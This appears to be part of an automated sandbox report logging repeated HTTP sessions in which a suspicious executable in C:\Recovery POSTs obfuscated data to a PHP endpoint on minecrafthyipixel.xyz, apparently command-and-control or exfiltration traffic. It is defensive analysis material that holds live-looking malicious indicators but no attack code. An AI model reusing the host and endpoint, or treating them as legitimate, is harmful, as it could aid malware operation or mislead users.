                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WCvOHodh5u5n6lbjparhpywPU9lnDCNHlJrkHd9ApoNKGmHX4I93mfTp8Vb0UJn%2FGt86hFEh0LbjytEMmzdFuvhvwRiv7ILrDoQWOJ95TbyaGDnK5n0KModU71afWxJwvUK5T1y%2FPAE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca32b98a86730-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:31.555908918 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.4 | 49840 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:31.782316923 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:31.886909008 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:32.236135006 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:32 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2FKXbpOWlstoQTiRrwQoZSDIAojTyHjq5TYaZxEgMeZF0%2BL0Q6LkTt5XmeAy%2Fg5kHyLOyPHQ5NWKuJ6vWTYJv7jJQg6ayVYq1%2FqCUNw3ZqiLKQeHZV6yXj%2BaCNz7k8aHS7JUThzLKyU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca32fff546779-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:32.236185074 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.4 | 49842 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:32.567759991 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2172
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:32.672477961 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:33.034478903 CEST | 766 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:32 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7GO9spD5XP%2BEbKz4vobrD4IKqL0A3BkuCC8HlPLr6zQU210CwSQYQUng%2Fnh66dCyBJJQaLRl8ITynkeZD4766lSaW6jpR2i1Fx41BkV8yFmzBtdn2Q7Z0EU6hEiPquPVVK6BGPzrIV0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca334ecea4527-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
Apr 19, 2024 13:43:33.034519911 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 49843 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:32.687083006 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:43:32.791620016 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:33.072165012 CEST | 613 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:33 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZ7itjL7NwnbKbKr4OAWaqIenKQHSjwoy49HsgypngTobAUM6NQC8zQqx9nltOig7tfwCPZt5QUQDtJ6CH84WFT6jeAPBwrX52J04RqGQzcvFnE10YrCbyqna3U1uSMXEOYgSiUQIjY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca335a98bb076-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:33.072201967 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 49844 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:33.300807953 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:43:33.404798985 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:33.685295105 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:33 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8rNfTEAQs2RDv1an%2FlEFaYvwb0rgiBFGopUu%2FBOrtilUc8RDDQBuP3TgoOrVyNmMXJdIswzivaiHyBHGphiNmuOkMOWfjle%2BL5oMUq8xr7g2oBp2WIrc2%2FySNEYmZJwP64O1gVV3QY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3397b03b06a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:33.685344934 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 49845 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:33.907149076 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:34.011806965 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:34.012062073 CEST | 2512 | OUT | Data Raw: 57 5a 5b 5c 59 42 51 5a 5c 5e 59 59 57 53 58 53 54 5a 5f 56 54 59 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[\YBQZ\^YYWSXSTZ_VTYSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%X>!+#3+[';"*;419R%(-#6U)#]4Z#9$[. X 5
Apr 19, 2024 13:43:34.382775068 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YY0uoXvpr7Cv9XPXfbJWcrFRWoXvw5ep6wD%2BdwmBkS%2FhFtFm60BNXv%2FVrqRdkIIOL9R7nfNOdnC2PgHxAxNnDOVF5I%2BiP1vpPTNFAXB1JLUvCcd4NVSrS9YeGQAGSZRf0Cne1QMskyI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca33d4a0e6756-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:34.382797003 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 49846 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:34.608321905 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:34.712671041 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:34.712961912 CEST | 2504 | OUT | Data Raw: 52 58 5e 54 5c 40 54 5c 5c 5e 59 59 57 57 58 5a 54 55 5f 58 54 58 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX^T\@T\\^YYWWXZTU_XTXSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%2"+';[0;)#1:<U%W#)*++\4\-%$[. X !
Apr 19, 2024 13:43:34.989496946 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IX2nYxTHmsDPpFe8AkqkVFXuziMb4A6EaSl%2FE2ifrwvsf591chQmvjlzDIq6czy9w2MEq6gzXpDNFGd%2BDITjzfRj2WDlQtIH9%2B%2FquWwLelmL1Ol19OYHET9aKd5uxC9f%2B%2FUgY%2FM5Quw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca341ab43672d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:34.989520073 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 49847 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:35.219624996 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:35.323859930 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:35.324008942 CEST | 2512 | OUT | Data Raw: 57 5e 5b 5c 59 4b 51 58 5c 5e 59 59 57 51 58 52 54 56 5f 5f 54 5f 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^[\YKQX\^YYWQXRTV__T_SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z%"U5+,Y3#;_0!P=;4&$+.42*8?\7Z:5$[. X =
Apr 19, 2024 13:43:35.597403049 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:35 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7v3rZg5YUdrAjmK2cPn5OWSbk9du2HxwwxK%2BcLtat77wMKWNoAMY2lks07dkmP5RudmH0000qu0OqQKE3Oihsn5M5qPuNzysxZY2te0oskuv4CLUJ5bMMLrI9az6%2BXarHYhrzDt6%2FU4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3457da4b04a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:35.597429991 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 49848 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:35.863596916 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:35.967883110 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:35.968077898 CEST | 2512 | OUT | Data Raw: 57 58 5b 5b 59 45 54 59 5c 5e 59 59 57 53 58 5d 54 51 5f 5b 54 58 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX[[YETY\^YYWSX]TQ_[TXSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&.2R"$0;\'P>^&:31;.S41=)+/#<8_-%$[. X 5
Apr 19, 2024 13:43:36.330974102 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qAwLlyOL%2B1TRUxH7Qquixd9AyBxKBVHLZ8zn5PXk%2FdEAYRREnMSo6tJKNWUlUXQsF4Jwg0RXA7tgpVyNSE0vfaC8MLT1NPq6OclybkQPL%2BMb36EWYFIfbdjBkajUQvqlbpQ8jN2LGRY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3497ffa44f6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:36.330997944 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 49849 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:36.561692953 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:36.666327953 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:36.666505098 CEST | 2512 | OUT | Data Raw: 52 59 5e 5b 59 4a 54 54 5c 5e 59 59 57 5f 58 52 54 57 5f 5e 54 59 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^[YJTT\^YYW_XRTW_^TYSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z&=5!(3 $'8.>;'\1:'%*P7>V)+?_7<,9$[. X
Apr 19, 2024 13:43:36.929672956 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iyjXD63Gq1REfjYzmtjAZY72y8Wt0u8EaJc1UHnoa8fx%2BBO%2BXbcvQ1ASS3hILTQ1Xml%2BqQj8Bh2k8EYA76olTX713cXjyxRV62RdnkyO72RfnW3BOFJMvcuSZr8p%2Bb2n3T854XdG0IA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca34ddb756744-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:36.929702997 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 49850 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:37.358191967 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:37.462452888 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:38.583352089 CEST | 2504 | OUT | Data Raw: 57 5c 5b 58 59 43 51 5d 5c 5e 59 59 57 57 58 5f 54 55 5f 58 54 5f 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[XYCQ]\^YYWWX_TU_XT_S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]&1",Z' 4$>\1:,R&!42>;< :$[. X 5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.4 | 49851 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:38.699636936 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2180
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:38.803930998 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:38.804451942 CEST | 2180 | OUT | Data Raw: 57 59 5e 58 59 41 54 5c 5c 5e 59 59 57 57 58 5e 54 5a 5f 58 54 5e 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
